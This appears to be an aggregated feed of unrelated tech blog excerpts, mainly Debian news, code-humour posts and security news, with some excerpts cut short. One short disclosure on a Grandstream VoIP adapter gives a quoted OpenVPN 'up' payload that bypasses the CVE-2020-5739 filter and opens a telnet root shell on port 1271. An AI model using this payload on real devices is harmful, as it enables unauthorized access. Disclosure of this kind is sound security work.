I won't reach an 11th: my Organisation in Red Hat is moving to
IBM. I think
this is sad news for Red Hat: they're losing some great people. But I'm
optimistic for the future of my Organisation.
Google seems to be more into tracking web users and generally becoming hostile to users [1]. So using a browser other than Chrome seems like a good idea. The problem is the lack of browsers with security support. It seems that the only browser engines with the quality of security support we expect in Debian are Firefox and the Chrome engine. The Chrome engine is used in Chrome, Chromium, and Microsoft Edge. Edge of course isn’t an option and Chromium still has some of the Google anti-features built in.
Firefox
So I tried to use Firefox for the things I do. One feature of Chrome-based browsers that I really like is the ability to set a custom page for the new tab. This feature was removed from Firefox because it was apparently being constantly attacked by malware [2]. There are addons to bring it back, but I prefer to have a minimal number of addons and not have any that exist just to replace deliberately broken settings in the browser. Also, those addons can’t use a file for the URL; I could point one at a web server instead, but it’s annoying to have to set up a web server to work around a browser limitation.
Another thing that annoyed me was that YouTube videos opened in new tabs don’t start playing when I change to the tab. There’s a Firefox setting for allowing web sites to autoplay, but there doesn’t seem to be a way to add sites to the list.
The Ungoogled Chromium project has a lot to offer for safer web browsing [5]. But the changes are invasive and it’s not included in Debian. Some of the changes like “replacing many Google web domains in the source code with non-existent alternatives ending in qjz9zk” are things that could be considered controversial. It definitely isn’t a candidate to replace the current Chromium package in Debian but might be a possibility to have as an extra browser.
What Next?
The Falkon browser, which is part of the KDE project, looks good, but QtWebEngine doesn’t have security support in Debian. Would it be possible to provide security support for it?
Ungoogled Chromium is available in Flatpak, so I’ll test that out. But ideally it would be packaged for Debian. I’ll try building a package of it and see how that goes.
Last November, the DebConf25 Team
asked
the community to help design the logo for the 25th
Debian Developers' Conference and the results
are in! The logo contest received
23 submissions
and we thank all the 295 people who took the time to participate in the
survey. There were several amazing proposals, so choosing was not easy.
We are pleased to
announce
that the winner of the logo survey is 'Tower with red Debian Swirl originating
from blue water' (option L), by Juliana Camargo and licensed CC BY-SA 4.0.
Juliana also shared with us a bit of her motivation, creative process and
inspiration when designing her logo:
The idea for this logo came from the city's landscape, the place where the
medieval tower looks over the river that meets the sea, almost like
guarding it. The Debian red swirl comes out of the blue water splash as a
continuous stroke, and they are also the French flag colours. I tried to
combine elements from the city when I was sketching in the notebook,
which is an important step for me as I feel that ideas flow much more
easily, but the swirl + water with the tower was the most refreshing
combination, so I jumped to the computer to design it properly. The water
bit was the most difficult element, and I used the Debian swirl as a base
for it, so both would look consistent. The city name font is a modern
calligraphy style and the overall composition is not symmetric but balanced
with the different elements. I am glad that the Debian community felt
represented with this logo idea!
Congratulations, Juliana, and thank you very much for your contribution to
Debian!
The DebConf25 Team would like to take this opportunity to remind you that
DebConf, the annual international Debian Developers Conference, needs your
help. If you want to help with the DebConf 25 organization, don't hesitate to
reach out to us via the #debconf-team
channel on OFTC.
Furthermore, we are always looking for sponsors. DebConf is run on a
non-profit basis, and all financial contributions allow us to bring together
a large number of contributors from all over the globe to
work collectively on Debian. Detailed information about the
sponsorship opportunities
is available on the DebConf 25 website.
Abdoullah sends us this little blob of C#, which maybe isn't a full-on WTF, but certainly made me chuckle.
if (file != null)
{
if (file.name.StartsWith(userName))
{
if (file.name.StartsWith(userName))
{
url = string.Format(FILE_LINK, file.itemId, file.name);
break;
}
}
}
Are you sure the file name starts with the user name? Are you really sure?
This code somehow slipped by code review, helped perhaps by the fact that the author was the senior-most team member and everyone assumed they were immune to these kinds of mistakes.
No one is immune.
Author: GW LeCroy Tokyo lay far below, smothered in a century-old, neon-streaked smog. A constant wail rose into Asami’s room from somewhere in the haze, sharp and setting her on edge. But above, a thousand shooting stars blazed orange-yellow trails across the navy sky. Asami’s eyes gleamed with awe, a thousand wishes flooded her heart. […]
The RcppUUID package
on CRAN has been providing
UUIDs (based on the underlying Boost
library) for several years. Written by Artem Klemsov and maintained
in this gitlab
repo, the package is a very nice example of clean and
straightforward library binding. As it had dropped off CRAN over a relatively minor
issue, I decided to adopt it with the previous 1.1.2
release made quite recently.
This release adds new high-resolution clock-based UUIDs according to
the v7 spec. Internally 100ns increments are represented. The resulting
UUIDs are both unique and sortable. I added this recent example to the
README.md which illustrates both the implicit ordering and uniqueness.
The unit tests check this with a much larger N.
While one can convert from the UUID object back to the clock
object, I am not aware of a text parser, so there is currently no inverse
function (as ulid offers) for the character
representation.
The NEWS entry for the two releases follows.
Changes in version 1.2.0
(2025-02-12)
Time-based UUIDs, ie version 7, can now be generated (requiring
Boost 1.86 or newer as in the current BH
package)
Here’s a supply-chain attack just waiting to happen. A group of researchers searched for, and then registered, abandoned Amazon S3 buckets for about $400. These buckets contained software libraries that are still used. Presumably the projects don’t realize that they have been abandoned, and still ping them for patches, updates, and so on.
The TL;DR is that this time, we ended up discovering ~150 Amazon S3 buckets that had previously been used across commercial and open source software products, governments, and infrastructure deployment/update pipelines—and then abandoned.
Naturally, we registered them, just to see what would happen—”how many people are really trying to request software updates from S3 buckets that appear to have been abandoned months or even years ago?”, we naively thought to ourselves.
Turns out they got eight million requests over two months.
Had this been an actual attack, they would have modified the code in those buckets to contain malware and watched as it was incorporated into different software builds around the internet. This is basically the SolarWinds attack, but much more extensive.
But there’s a second dimension to this attack. Because these update buckets are abandoned, the developers who are using them also no longer have the power to patch them automatically to protect them. The mechanism they would use to do so is now in the hands of adversaries. Moreover, often—but not always—losing the bucket that they’d use for it also removes the original vendor’s ability to identify the vulnerable software in the first place. That hampers their ability to communicate with vulnerable installations.
Software supply-chain security is an absolute mess. And it’s not going to be easy, or cheap, to fix. Which means that it won’t be. Which is an even worse mess.
I have a Grandstream HT802V2 running firmware 1.0.3.5, and while playing around with the VPN settings I realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient.
Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn did
Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf), it already uses up and therefore sets script-security 2, so injecting that is unnecessary.
Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'" into one of the command-executing options, a shell listening on port 1271 will be opened.
The filtering looks for lines that start with zero or more occurrences of a space, followed by the option name (up, down, etc), followed by another space.
While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab either via the web interface or via SSH/gs_config.
However, OpenVPN also allows quoting, which is only documented for parameters, but works just as well for option names too.
That means that instead of
up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
from the original exploit by Tenable, we write
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
this still will be a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn won't catch it and the resulting OpenVPN configuration will include the exploit:
Yes, we actually do have code reviews and testing practices. A version of this code was tested successfully prior to this version being merged in, somehow.
Well, that's ominous. Let's look at the code.
public static SqsClient create()
{
    try {
        SqsClient sqsClient = SqsClient.builder() ... .build();
        return sqsClient;
    } catch (Exception e) {
        log.error("SQS - exception creating sqs client", e);
    } finally {
        // Uncomment this to test the sqs in a test environment
        // return SqsClient.builder(). ... .build();
        return null;
    }
}
Eric found this when he discovered that the application wasn't sending messages to their queue. According to the logs, there were messages to send, they just weren't being sent.
Eric made the mistake of looking for log messages around sending messages, when instead he should have been looking at module startup, where the error message above appeared.
This code attempts to create a connection, and if it fails for any reason, it logs an error and returns null. Worse, because the return null sits in the finally block, it overrides the return in the try block, so the method returns null even when the client was created successfully. And there's a delightful "comment this out" for running in the test environment, which, please, god no. Don't do configuration management by commenting out lines of code. Honestly, that's the worst thing in this code, to me.
In any case, the calling code "properly" handled nulls by just disabling sending to the queue silently, which made this harder to debug than it needed to be.
Author: Daniela Tabrea The soft roar of the circulation pumps bid her a warm welcome. Maybe not warm, but sterile. Exactly what she’d been looking for. Jaimee hoped this would be the last time she ever moved apartments. Her previous place was substandard, to say the least. The landlord distilled heavy liquor in the building […]
Microsoft today issued security updates to fix at least 56 vulnerabilities in its Windows operating systems and supported software, including two zero-day flaws that are being actively exploited.
All supported Windows operating systems will receive an update this month for a buffer overflow vulnerability that carries the catchy name CVE-2025-21418. This patch should be a priority for enterprises, as Microsoft says it is being exploited, has low attack complexity, and no requirements for user interaction.
Tenable senior staff research engineer Satnam Narang noted that since 2022, there have been nine elevation of privilege vulnerabilities in this same Windows component — three each year — including one in 2024 that was exploited in the wild as a zero day (CVE-2024-38193).
“CVE-2024-38193 was exploited by the North Korean APT group known as Lazarus Group to implant a new version of the FudModule rootkit in order to maintain persistence and stealth on compromised systems,” Narang said. “At this time, it is unclear if CVE-2025-21418 was also exploited by Lazarus Group.”
The other zero-day, CVE-2025-21391, is an elevation of privilege vulnerability in Windows Storage that could be used to delete files on a targeted system. Microsoft’s advisory on this bug references something called “CWE-59: Improper Link Resolution Before File Access,” says no user interaction is required, and that the attack complexity is low.
Adam Barnett, lead software engineer at Rapid7, said although the advisory provides scant detail, and even offers some vague reassurance that ‘an attacker would only be able to delete targeted files on a system,’ it would be a mistake to assume that the impact of deleting arbitrary files would be limited to data loss or denial of service.
“As long ago as 2022, ZDI researchers set out how a motivated attacker could parlay arbitrary file deletion into full SYSTEM access using techniques which also involve creative misuse of symbolic links,” Barnett wrote.
One vulnerability patched today that was publicly disclosed earlier is CVE-2025-21377, another weakness that could allow an attacker to elevate their privileges on a vulnerable Windows system. Specifically, this is yet another Windows flaw that can be used to steal NTLMv2 hashes — essentially allowing an attacker to authenticate as the targeted user without having to log in.
According to Microsoft, minimal user interaction with a malicious file is needed to exploit CVE-2025-21377, including selecting, inspecting or “performing an action other than opening or executing the file.”
“This trademark linguistic ducking and weaving may be Microsoft’s way of saying ‘if we told you any more, we’d give the game away,'” Barnett said. “Accordingly, Microsoft assesses exploitation as more likely.”
The SANS Internet Storm Center has a handy list of all the Microsoft patches released today, indexed by severity. Windows enterprise administrators would do well to keep an eye on askwoody.com, which often has the scoop on any patches causing problems.
It’s getting harder to buy Windows software that isn’t also bundled with Microsoft’s flagship Copilot artificial intelligence (AI) feature. Last month Microsoft started bundling Copilot with Microsoft Office 365, which Redmond has since rebranded as “Microsoft 365 Copilot.” Ostensibly to offset the costs of its substantial AI investments, Microsoft also jacked up prices from 22 percent to 30 percent for upcoming license renewals and new subscribers.
Office-watch.com writes that existing Office 365 users who are paying an annual cloud license do have the option of “Microsoft 365 Classic,” an AI-free subscription at a lower price, but that many customers are not offered the option until they attempt to cancel their existing Office subscription.
In other security patch news, Apple has shipped iOS 18.3.1, which fixes a zero day vulnerability (CVE-2025-24200) that is showing up in attacks.
Adobe has issued security updates that fix a total of 45 vulnerabilities across InDesign, Commerce, Substance 3D Stager, InCopy, Illustrator, Substance 3D Designer and Photoshop Elements.
Chris Goettl at Ivanti notes that Google Chrome is shipping an update today which will trigger updates for Chromium based browsers including Microsoft Edge, so be on the lookout for Chrome and Edge updates as we proceed through the week.
derive-deftly is a template-based derive-macro facility for Rust. It has been a great success. Your codebase may benefit from it too!
Rust programmers will appreciate its power, flexibility, and consistency, compared to macro_rules; and its convenience and simplicity, compared to proc macros.
Programmers coming to Rust from scripting languages will appreciate derive-deftly’s convenient automatic code generation, which works as a kind of compile-time introspection.
I’m often a fan of metaprogramming, including macros. They can help remove duplication and flab, which are often the enemy of correctness.
Rust has two macro systems. derive-deftly offers much of the power of the more advanced (proc_macros), while beating the simpler one (macro_rules) at its own game for ease of use.
(Side note: Rust has at least three other ways to do metaprogramming: generics; build.rs; and, multiple module inclusion via #[path=]. These are beyond the scope of this blog post.)
macro_rules! aka “pattern macros”, “declarative macros”, or sometimes “macros by example” are the simpler kind of Rust macro.
They involve writing a sort-of-BNF pattern-matcher, and a template which is then expanded with substitutions from the actual input. If your macro wants to accept comma-separated lists, or other simple kinds of input, this is OK. But often we want to emulate a #[derive(...)] macro: e.g., to define code based on a struct, handling each field. Doing that with macro_rules is very awkward:
macro_rules!’s pattern language doesn’t have a cooked way to match a data structure, so you have to hand-write a matcher for Rust syntax, in each macro. Writing such a matcher is very hard in the general case, because macro_rules lacks features for matching important parts of Rust syntax (notably, generics). (If you really need to, there’s a horrible technique as a workaround.)
And, the invocation syntax for the macro is awkward: you must enclose the whole of the struct in my_macro! { }. This makes it hard to apply more than one macro to the same struct, and produces rightward drift.
Enclosing the struct this way means the macro must reproduce its input - so it can have bugs where it mangles the input, perhaps subtly. This also means the reader cannot be sure precisely whether the macro modifies the struct itself. In Rust, the types and data structures are often the key places to go to understand a program, so this is a significant downside.
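As a toy sketch (not from the original post; the macro body and the struct here are invented), the invocation ends up looking like this, with the macro having to match and re-emit the entire item as well as generate its own code:

macro_rules! my_macro {
    // Hand-written matcher for (a small subset of) struct syntax.
    ($(#[$meta:meta])* $vis:vis struct $name:ident { $($body:tt)* }) => {
        // The macro must reproduce its input...
        $(#[$meta])* $vis struct $name { $($body)* }

        // ...in addition to the code it actually wants to generate.
        impl $name {
            pub fn type_name() -> &'static str { stringify!($name) }
        }
    };
}

my_macro! {
    pub struct Config {
        pub listen_addr: String,
        pub max_connections: u32,
    }
}

fn main() {
    println!("{}", Config::type_name());
}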
macro_rules also has various other weird deficiencies too specific to list here.
Overall, compared to (say) the C preprocessor, it’s great, but programmers used to the power of Lisp macros, or (say) metaprogramming in Tcl, will quickly become frustrated.
Rust’s second macro system is much more advanced. It is a fully general system for processing and rewriting code. The macro’s implementation is Rust code, which takes the macro’s input as arguments, in the form of Rust tokens, and returns Rust tokens to be inserted into the actual program.
This approach is more similar to Common Lisp’s macros than to most other programming languages’ macros systems. It is extremely powerful, and is used to implement many very widely used and powerful facilities. In particular, proc macros can be applied to data structures with #[derive(...)]. The macro receives the data structure, in the form of Rust tokens, and returns the code for the new implementations, functions etc.
This is used very heavily in the standard library for basic features like #[derive(Debug)] and Clone, and for important libraries like serde and strum.
But, it is a complete pain in the backside to write and maintain a proc_macro.
The Rust types and functions you deal with in your macro are very low level. You must manually handle every possible case, with runtime conditions and pattern-matching. Error handling and recovery is so nontrivial there are macro-writing libraries and even more macros to help. Unlike a Lisp codewalker, a Rust proc macro must deal with Rust’s highly complex syntax. You will probably end up dealing with syn, which is a complete Rust parsing library, separate from the compiler; syn is capable and comprehensive, but a proc macro must still contain a lot of often-intricate code.
There are build/execution environment problems. The proc_macro code can’t live with your application; you have to put the proc macros in a separate cargo package, complicating your build arrangements. The proc macro package environment is weird: you can’t test it separately without jumping through hoops. Debugging can be awkward. Proper tests can only realistically be done with the help of complex additional tools, and will involve a pinned version of Nightly Rust.
This is a nice example, also, of how using a macro can avoid bugs. Implementing this update by hand without a macro would involve a lot of cut-and-paste. When doing that cut-and-paste it can be very easy to accidentally write bugs where you forget to update some parts of each of the copies:
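(The post's own snippet is not reproduced here; the following is a hypothetical sketch of the shape of such a slip, with invented type and function names.)

// Both fields have the same type, so the compiler cannot catch the
// pasted-but-not-edited line.
struct OldRecord { status: String, info: String }
struct NewRecord { status: String, info: String }

fn update(old: &OldRecord) -> NewRecord {
    NewRecord {
        status: old.status.clone(),
        info: old.status.clone(), // pasted line, not edited: should be old.info
    }
}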
Spot the mistake? We copy status to info. Bugs like this are extremely common, and not always found by the type system. derive-deftly can make it much easier to make them impossible.
Because of the difficult and cumbersome nature of proc macros, very few projects have site-specific, special-purpose #[derive(...)] macros.
The Arti codebase has no bespoke proc macros, across its 240kloc and 86 crates. (We did fork one upstream proc macro package to add a feature we needed.) I have only one bespoke, case-specific, proc macro amongst all of my personal Rust projects; it predates derive-deftly.
Since we have started using derive-deftly in Arti, it has become an important tool in our toolbox. We have 37 bespoke derive macros, done with derive-deftly. Of these, 9 are exported for use by downstream crates. (For comparison there are 176 macro_rules macros.)
In my most recent personal Rust project, I have 22 bespoke derive macros, done with derive-deftly, and 19 macro_rules macros.
derive-deftly macros are easy and straightforward enough that they can be used as readily as macro_rules macros. Indeed, they are often clearer than a macro_rules macro.
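For a flavour of what a bespoke derive looks like, here is a minimal sketch modelled loosely on the examples in the derive-deftly documentation (the macro and struct names are invented, and the exact template syntax may differ in detail between releases):

use derive_deftly::{define_derive_deftly, Deftly};

// A bespoke derive: for any struct it is applied to, generate a method
// returning the names of its fields.
define_derive_deftly! {
    FieldNames:

    impl $ttype {
        pub fn field_names() -> &'static [&'static str] {
            &[ $( stringify!( $fname ) , ) ]
        }
    }
}

#[derive(Deftly)]
#[derive_deftly(FieldNames)]
struct Dimensions {
    width: u32,
    height: u32,
}

fn main() {
    // Prints ["width", "height"]
    println!("{:?}", Dimensions::field_names());
}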
But declaring it 1.0 doesn’t mean that it won’t improve further.
Our ticket tracker has a laundry list of possible features. We’ll sometimes be cautious about committing to these, so we’ve added a beta feature flag, for opting in to less-stable features, so that we can prototype things without painting ourselves into a corner. And, we intend to further develop the Guide.
Tired of waiting for apt to finish installing packages? Wish there were a way to make your installations blazingly fast without caring about minor things like, oh, data integrity? Well, today is your lucky day!
I’m thrilled to introduce apt-eatmydata, now available for Debian and all supported Ubuntu releases!
What Is apt-eatmydata?
If you’ve ever used libeatmydata, you know it’s a nifty little hack that disables fsync() and friends, making package installations way faster by skipping unnecessary disk writes. Normally, you’d have to remember to wrap apt commands manually, like this:
eatmydata apt install texlive-full
But who has time for that? apt-eatmydata takes care of this automagically by integrating eatmydata seamlessly into apt itself! That means every package install is now turbocharged—no extra typing required.
How to Get It
Debian
If you’re on Debian unstable/testing (or possibly soon in stable-backports), you can install it directly with:
sudo apt install apt-eatmydata
Ubuntu
Ubuntu users already enjoy faster package installation thanks to zstd-compressed packages, and to shift into an even higher gear I’ve backported apt-eatmydata to all supported Ubuntu releases. Just add this PPA and install:
And boom! Your apt install times are getting a serious upgrade. Let’s run some tests…
# pre-download package to measure only the installation
$ sudo apt install -d linux-headers-6.8.0-53-lowlatency
...
# installation time is 9.35s without apt-eatmydata:
$ sudo time apt install linux-headers-6.8.0-53-lowlatency
...
2.30user 2.12system 0:09.35elapsed 47%CPU (0avgtext+0avgdata 174680maxresident)k
32inputs+1495216outputs (0major+196945minor)pagefaults 0swaps
$ sudo apt install apt-eatmydata
...
$ sudo apt purge linux-headers-6.8.0-53-lowlatency
# installation time is 3.17s with apt-eatmydata:
$ sudo time eatmydata apt install linux-headers-6.8.0-53-lowlatency
2.30user 0.88system 0:03.17elapsed 100%CPU (0avgtext+0avgdata 174692maxresident)k
0inputs+205664outputs (0major+198099minor)pagefaults 0swaps
apt-eatmydata just made installing Linux headers 3x faster!
But Wait, There’s More!
If you’re automating CI builds, there’s even a GitHub Action to make your workflows faster: it essentially does what apt-eatmydata does, and setting it up takes less than a second! Check it out here: GitHub Marketplace: apt-eatmydata
Should You Use It?
Warning: apt-eatmydata is not for all production environments. If your system crashes mid-install, you might end up with a broken package database. But for throwaway VMs, containers, and CI pipelines? It’s an absolute game-changer. I use it on my laptop, too.
So go forth and install recklessly fast!
If you run into any issues, feel free to file a bug or drop a comment. Happy hacking!
Recently createrepo-c on Debian unstable was updated from 0.17.3 to 1.2.0.
It introduces a compatibility break in the generated metadata (repodata/*).
In previous versions the generated metadata was compressed in gz format; the newer version uses zst compression instead.
This breaks some yum clients, because old yum clients can't handle the newer metadata format correctly.
At least (as far as I know) it affects Amazon Linux 2, for example.
To keep compatibility with such old platforms, you need to pass the --compatibility option to createrepo-c.
Author: Majoki Still puzzled, Mya Kirin fixated on the sign: Last Casket Company. The moniker didn’t make much sense, but she’d always felt a calling to look into the unexplained. To push for answers. She wished it could’ve been a real job. A job she was paid to do. A job that was once called […]
As the saying goes, there are only two hard problems in computer science: naming things, cache invalidations, and off by one errors. Chris's predecessor decided to tackle the second one, mostly by accurately(?) naming a class:
class SimpleCache
{
}
This is, in fact, the simplest cache class I can imagine. Arguably, it's a bit too simple.
Instances of this class abound in code, though no one is entirely sure why. Future optimization? Just no one understanding what they're doing? Oh right, it's that one. It's always no one understanding what they're doing.
Python 3.13 is now the default Python 3 version in Debian, by Stefano Rivera and Colin Watson
The Python 3.13 as default transition has now completed. The next step is to
remove Python 3.12 from the archive, which should be very straightforward: it
just requires rebuilding C extension packages in no particular order. Stefano
fixed some miscellaneous bugs blocking the completion of the 3.13 as default
transition.
Fixing qtpaths6 for cross compilation, by Helmut Grohne
While Qt5 used to use qmake to query installation properties, Qt6 is moving
more and more to CMake, and to ease that transition it relies more on qtpaths.
Since this tool is not naturally aware of the architecture it is called for, it
tends to produce results for the build architecture. Therefore, more than 100
packages were picking up a multiarch directory for the build architecture during
cross builds. In collaboration with the Qt/KDE team and Sandro Knauß in
particular (none affiliated with Freexian), we added an architecture-specific
wrapper script in the same way qmake has one for Qt5 and Qt6 already. The
relevant CMake module has been updated to prefer the triplet-prefixed wrapper.
As a result, most of the KDE packages now cross build on unstable ready in time
for the trixie release.
/usr-move, by Helmut Grohne
In December, Emil Södergren reported that a live-build was not working for him
and in January, Colin Watson reported that the proposed mitigation for
debian-installer-utils would practically fail. Both failures were to be
attributed to a wrong understanding of implementation-defined behavior in
dpkg-divert. As a
result, all M18 mitigations had to be reviewed and many of them replaced. Many
have been uploaded already and all instances have received updated patches.
Even though dumat has been in
operation for more than a year, it gained recent changes. For one thing,
analysis of architectures other than amd64 was requested. Chris Hofstaedler
(not affiliated with Freexian) kindly provided computing resources for
repeatedly running it on the larger set. Doing so revealed various
cross-architecture undeclared file conflicts in gcc, glibc, and
binutils-z80, but it also revealed a previously unknown /usr-move issue in
rpi.rpi-common. On top of that, dumat produced false positive diagnostics
and wrongly associated Debian bugs in some cases, both of which have now been
fixed. As a result, a supposedly fixed python3-sepolicy issue had to be
reopened.
rebootstrap, by Helmut Grohne
As much as we think of our base system as stable, it is changing a lot and the
architecture cross bootstrap tooling is very sensitive to such changes requiring
permanent maintenance. A problem that recently surfaced was that building a
binutils cross toolchain would result in a binutils-for-host package that
would not be practically installable as it would depend on a binutils-common
package that was not built. This turned into an examination of binutils-common
and noticing that it actually differed across architectures even though it
should not. Johannes Schauer Marin Rodrigues (not affiliated with Freexian) and
Colin Watson kindly helped brainstorm possible solutions. Eventually, Helmut
provided a patch to move gprofng bits out of
binutils-common. Independently, Matthias Klose
(not affiliated with Freexian) split out binutils-gold into a separate source
package. As a result, binutils-common is now equal across architectures and
can be marked Multi-Arch: foreign resolving the initial problem.
Salsa CI, by Santiago Ruano Rincón
Santiago continued the work on sbuild support for Salsa CI that was
mentioned in the previous monthly
report. The
!568
merge request that created the new build image was merged, making it easier to
test !569
with external projects. Santiago used a fork of the debusine repo to try the
draft !569,
and some issues were spotted, and part of them fixed. This is the last debusine
pipeline run with the current
!569:
https://salsa.debian.org/santiago/debusine/-/pipelines/794233.
One of the last improvements relates to how to enable projects to customize the
pipeline, in a way equivalent to what they currently do in the extract-source
and build jobs. While this is work-in-progress, the results are rather
promising. Next steps include deciding on introducing schroot support for
bookworm, bookworm-security, and older releases, as is done on the
official Debian buildds.
DebConf preparations, by Stefano Rivera and Santiago Ruano Rincón
DebConf will be happening in Brest, France, in July. Santiago continued the
DebConf 25 organization work, looking for catering providers.
Both Stefano and Santiago have been reaching out to some potential sponsors.
DebConf depends on sponsors to cover the organization cost; if your company
depends on Debian, please consider sponsoring
DebConf.
Stefano has been winding up some of the finances from previous DebConfs:
finalizing reimbursements to team members from DebConf 23, and handling some
outstanding issues from DebConf 24. Stefano and the rest of the DebConf
committee have been reviewing bids for DebConf 26, to select the next venue.
Ruby 3.3 is now the default Ruby interpreter, by Lucas Kanashiro
Ruby 3.3 is about to become the default Ruby interpreter for Trixie. Many bugs
were fixed by Lucas and the Debian Ruby team during the sprint held in Paris
on January 27-31. The
next step is to remove support of Ruby 3.1, which is the alternative Ruby
interpreter for now. Thanks to the Debian Release team for all the support,
especially Emilio Pozuelo Monfort.
Rails 7 transition, by Lucas Kanashiro
Rails 6 has been shipped in Debian since Bullseye, and as a web framework it has
accumulated many issues (especially security-related ones), making it harder
and harder to maintain. With that in mind, during the
Debian Ruby team sprint last
month, the transition to
Rack 3 (an important dependency of Rails containing many breaking changes) was
started in Debian unstable and is ongoing. Once it is done, the Rails 7
transition will take place, and Rails 7 should be shipped in Debian Trixie.
Miscellaneous contributions
Stefano improved a poor ImportError for users of the turtle module on Python
3, who haven’t installed the python3-tk package.
Stefano updated several packages to new upstream releases.
Stefano added the Python extension to the re2 package, allowing for the use
of the Google RE2 regular expression library as a direct replacement for the
standard library re module.
Stefano started provisioning a new physical server for the
debian.social infrastructure.
Carles improved simplemonitor (documentation on systemd integration, worked
with upstream for fixing a bug).
Carles upgraded packages to new upstream versions: python-ring-doorbell and
python-asyncclick.
Carles did po-debconf translations to Catalan: reviewed 44 packages and
submitted translations to 90 packages (via salsa merge requests or bugtracker
bugs).
Carles maintained po-debconf-manager with small fixes.
Raphaël worked on some outstanding
DEP-14 merge
requests and
participated in the associated discussion. The discussions have been more
contentious than anticipated, somewhat exacerbated by Otto’s desire to
conclude fast while the required tool support is not yet there.
Raphaël, with the help of Philipp Kern from the DSA team, upgraded
tracker.debian.org to use Django 4.2 (from bookworm-backports) which in turn
enabled him to configure authentication via salsa.debian.org. It’s now
possible to login to tracker.debian.org with your salsa credentials!
Raphaël updated zim — a nice desktop wiki that is very handy to organize
your day-to-day digital life — to the latest upstream version (0.76).
I'm not sure whether to laugh or cry over this: Federal judges have issued President Donald Trump
stinging legal rebukes in the early clashes over his blitz of executive
orders, and two of his top aides have responded by suggesting that his
administration defy the courts and move forward with its agenda. There’s no indication that Trump has adopted such a strategy, although a U.S. judge in Rhode
It has been a while since I posted a summary of the free software and
open culture activities and projects I have worked on. Here is a
quick summary of the major ones from last year.
I guess the biggest project of the year has been migrating orphaned
packages in Debian without a version control system to have a git
repository on salsa.debian.org. When I started in April, around 450 of
the orphaned packages needed git. I've since migrated around 250 of
the packages to a salsa git repository, and around 40 packages were
left when I took a break. Not sure who did the around 160 conversions
I was not involved in, but I am very glad I got some help on the
project. I stopped partly because some of the remaining packages
needed more disk space to build than I have available on my
development machine, and partly because some had a strange build setup
I could not figure out. I had a time budget of 20 minutes per
package; if the package proved problematic and likely to take longer,
I moved to another package. Might continue later, if I manage to free
up some disk space.
Another rather big project was the translation to Norwegian Bokmål
and publishing of the first book ever published by a Sámi woman, the
«Møter
vi liv eller død?» book by Elsa Laula, with a PD0 and CC-BY
license. I released it during the summer, and to my surprise it has
already sold several copies. As I suck at marketing, I did not expect
to sell any.
A smaller, but more long term project (for more than 10 years now),
and related to orphaned packages in Debian, is my project to ensure a
simple way to install hardware related packages in Debian when the
relevant hardware is present in a machine. It made a fairly big
advance forward last year, partly because I have been poking and
begging package maintainers and upstream developers to include
AppStream metadata XML in their packages. I've also released a few
new versions of the isenkram system with some robustness improvements.
Today 127 packages in Debian provide such information, allowing
isenkram-lookup to propose them. I will keep pushing until the
roughly 35 package names currently hard coded in the isenkram package
are down to zero, so that only information provided by individual packages
is used for this feature.
As part of the work on AppStream, I have sponsored several packages
into Debian where the maintainer wanted to fix the issue but lacked
direct upload rights. I've also sponsored a few other packages, when
approached by the maintainer.
I would also like to mention two hardware related packages in
particular where I have been involved, the megactl and mfi-util
packages. Both work with the hardware RAID systems in several Dell
PowerEdge servers, and the first one is already available in Debian
(and of course, proposed by isenkram when used on the appropriate Dell
server), while the other has been waiting for NEW processing since this autumn. I
manage several such Dell servers and would like the tools needed to
monitor and configure these RAID controllers to be available from
within Debian out of the box.
Vaguely related to hardware support in Debian, I have also been
trying to find ways to help out the Debian ROCm team, to improve the
support in Debian for my artificial idiocy (AI) compute node. So far
I have only uploaded one package, helped test the initial packaging of
llama.cpp and tried to figure out how to get good speech recognition
like Whisper into Debian.
I am still involved in the LinuxCNC project, and organised a
developer gathering in Norway last summer. A new one is planned for the
summer of 2025. I've also helped evaluate patches and uploaded new
versions of LinuxCNC into Debian.
After a 10-year-long break, we managed to get a new and improved
upstream version of lsdvd released just before Christmas. As
I use it regularly to maintain my DVD archive, I was very happy to
finally get out a version supporting DVDDiscID useful for uniquely
identifying DVDs. I am dreaming of an Internet service mapping DVD IDs
to IMDB movie IDs, to make life as a DVD collector easier.
My involvement in Norwegian archive standardisation and the free
software implementation of the vendor neutral Noark 5 API continued
for the entire year. I've been pushing patches into both the API and
the test code for the API, participated in several editorial meetings
regarding the Noark 5 Tjenestegrensesnitt specification, submitted
several proposals for improvements for the same. We also organised a
small seminar for Noark 5 interested people, and are organising a new
seminar in a month.
Andrew worked with Stuart. Stuart was one of those developers who didn't talk to anyone except to complain about how stupid management was, or how stupid the other developers were. Stuart was also the kind of person who would suddenly go on a tear, write three thousand lines of code in an evening, and then submit a pull request. He wouldn't respond to PR comments, however, and would just wait until management needed the feature merged badly enough that someone said, "just approve it so we can move on."
int iDisplayFlags = objectProps.DisplayInfo.BackgroundPrintFlags;
bool bForceBackgroundOn = false;
bool bForceBackgroundOff = false;
// Can't use _displayTypeID because it will always be 21 since text displays as image
if (_fileTypeID == 11) // TEXT
{
if ((iDisplayFlags & 0x1008) != 0) // Text Background is required
{
bForceBackgroundOn = true;
}
else if ((iDisplayFlags & 0x1001) != 0) // Text Background is not available
{
bForceBackgroundOff = true;
}
}
else if (_displayTypeID == 21) // IMAGE
{
if ((iDisplayFlags & 0x1200) != 0) // Image Background is required
{
bForceBackgroundOn = true;
}
else if ((iDisplayFlags & 0x1040) != 0) // Image Background is not available
{
bForceBackgroundOff = true;
}
}
bool useBackground = bForceBackgroundOn;
// If an object does not have an Background and we try to use it, bad things happen.
// So we check to see if we really have an Background, if not we don't want to try and use it
if (!useBackground && objectProps.DisplayInfo.Background)
{
useBackground = Convert.ToBoolean(BackgroundShown);
}
if (bForceBackgroundOff)
{
useBackground = false;
}
This code is inside of a document viewer application. As you might gather from skimming it, the viewer will display text (as an image) or images (as an image) and may or may not display a background as part of it.
This code, of course, uses a bunch of magic numbers and bitwise operators, which is always fun. We don't need any constants. It's important to note that all the other developers on the project did use enumerations and constants. The values were defined and well organized in the code; Stuart simply chose not to use them.
